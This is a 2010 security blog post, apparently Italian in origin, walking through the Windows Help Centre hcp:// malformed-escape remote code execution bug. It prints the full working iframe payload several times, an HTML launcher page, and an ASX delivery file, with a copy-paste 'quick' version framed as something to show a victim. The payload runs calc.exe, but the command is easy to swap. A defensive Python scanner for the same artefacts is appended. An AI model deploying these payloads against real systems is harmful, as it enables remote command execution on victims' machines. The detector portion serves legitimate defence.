ClsHack: Computer Security Blog

[EXPLOIT] Windows Help Centre Remote Code Execution


Another exploit for Windows, one that allows command execution on the victim's PC.
Time to switch to Linux :D

But let's look at how this exploit works. It is called:
Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

This exploit uses an ASX file to open Windows Help Center with a malformed hcp:// URL; because Help Center handles the malformed escape sequences incorrectly, the URL ends up running a command of our choosing, for example opening the
calculator :D

ASX files are:

An ASX file (Advanced Stream Redirector) is a special type of file which works closely with Windows Media ASF files.

The malformed URL in question is built like this:
<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E">

So all we have to do is get the victim to open an ASX file with Windows Media Player :D
P.S.: below there is a quicker way to do it -.-' without an ASX file :D

This is where the browser comes in and lets us do it ;)
HTML page to show the victim:

<html>
<head><title>Testing HCP</title></head>
<body>
  <h1>OK</h1>
  <script>
        // HCP:// Vulnerability, Tavis Ormandy, June 2010.
        var asx = "SIMPLE.ASX";

        if (window.navigator.appName == "Microsoft Internet Explorer") {
            // Internet Explorer
            var o = document.createElement("OBJECT");
            o.setAttribute("classid", "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6");
            o.openPlayer(asx);
        } else {
            // Mozilla, Chrome, Etc.
            var o = document.createElement("IFRAME");
            o.setAttribute("src", asx);
            document.body.appendChild(o);
        }
  </script>
</body>
</html>

Where the SIMPLE.ASX file will be on our server and will look like this:

<ASX VERSION="3.0">
<PARAM name="HTMLView" value="starthelp.html"/>
<ENTRY>
   <REF href="http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/bug-vs-feature.jpg"/>
</ENTRY>
</ASX>

And where the starthelp file will look like this:

<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E">

Now, I haven't understood why you need to go through the ASX file -.-' the authors made life harder for themselves -.-'

If you want to run the exploit quickly, just copy this into an HTML file:

<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E">

Tested on Windows XP with IE 7 and everything works ;)
For once IE has nothing to do with it though :D
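
As an added defensive example (not code from the post or from the original advisory), a Python scanner that flags the two artefacts of the chain described above in HTML or ASX content: an ASX HTMLView parameter that makes Windows Media Player render an HTML page, and an hcp:// URL carrying malformed percent escapes or '..' traversal. The sample inputs are constructed, with the script payload replaced by a placeholder.

```python
import re
from html.parser import HTMLParser

# Signals of the Help Center (hcp://) abuse discussed above: a '%' not followed by
# two hex digits (also catches the non-standard %uXXXX form) and '..' traversal.
MALFORMED_ESCAPE = re.compile(r"%(?![0-9A-F]{2})", re.IGNORECASE)
TRAVERSAL = re.compile(r"\.\.(?:/|\\|%2F|%5C)", re.IGNORECASE)

class _LinkExtractor(HTMLParser):
    """Collects src/href attributes and ASX <PARAM name="HTMLView"> targets."""
    def __init__(self):
        super().__init__()
        self.urls = []      # (tag, attribute, value)
        self.htmlview = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        for name in ("src", "href"):
            if attrs.get(name):
                self.urls.append((tag, name, attrs[name]))
        if tag == "param" and (attrs.get("name") or "").lower() == "htmlview":
            self.htmlview.append(attrs.get("value") or "")

def scan_markup(text):
    """Return findings for one HTML or ASX document; [] means nothing suspicious."""
    parser = _LinkExtractor()
    parser.feed(text)
    findings = []
    for view in parser.htmlview:  # the post's delivery step: WMP rendering HTML
        findings.append({"kind": "asx-htmlview", "value": view, "reasons": ["HTMLView param"]})
    for tag, attr, url in parser.urls:
        if not url.lstrip().lower().startswith("hcp:"):
            continue
        reasons = []
        bad = len(MALFORMED_ESCAPE.findall(url))
        if bad:
            reasons.append("%d malformed %% escape(s)" % bad)
        if TRAVERSAL.search(url):
            reasons.append("path traversal")
        if reasons:
            findings.append({"kind": "hcp-url", "tag": tag, "attr": attr, "reasons": reasons})
    return findings

# Constructed samples (not from the page): ASX delivery file, malformed hcp:// iframe
# with the script payload replaced by a placeholder, and a benign Help link.
SAMPLE_ASX = ('<ASX VERSION="3.0"><PARAM name="HTMLView" value="starthelp.html"/>'
              '<ENTRY><REF href="http://example.invalid/a.wmv"/></ENTRY></ASX>')
SAMPLE_HTML = ('<iframe src="hcp://services/search?query=anything&topic=hcp://system/'
               'sysinfo/sysinfomain.htm%A%%A%%A%..%5C..%5Csysinfomain.htm%u003fsvr=PLACEHOLDER">')
BENIGN_HTML = '<a href="hcp://system/sysinfo/sysinfomain.htm">Help</a>'
```

A well-formed hcp:// link to a Help page produces no finding, so the scanner can run over proxy-captured HTML or mail attachments without flagging ordinary Help shortcuts.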

OFFICIAL EXPLOIT LINK AND DOCUMENTATION


This entry was posted on Thursday, June 10th, 2010 at 10:06 am and is filed under Hacking, Software, Windows.
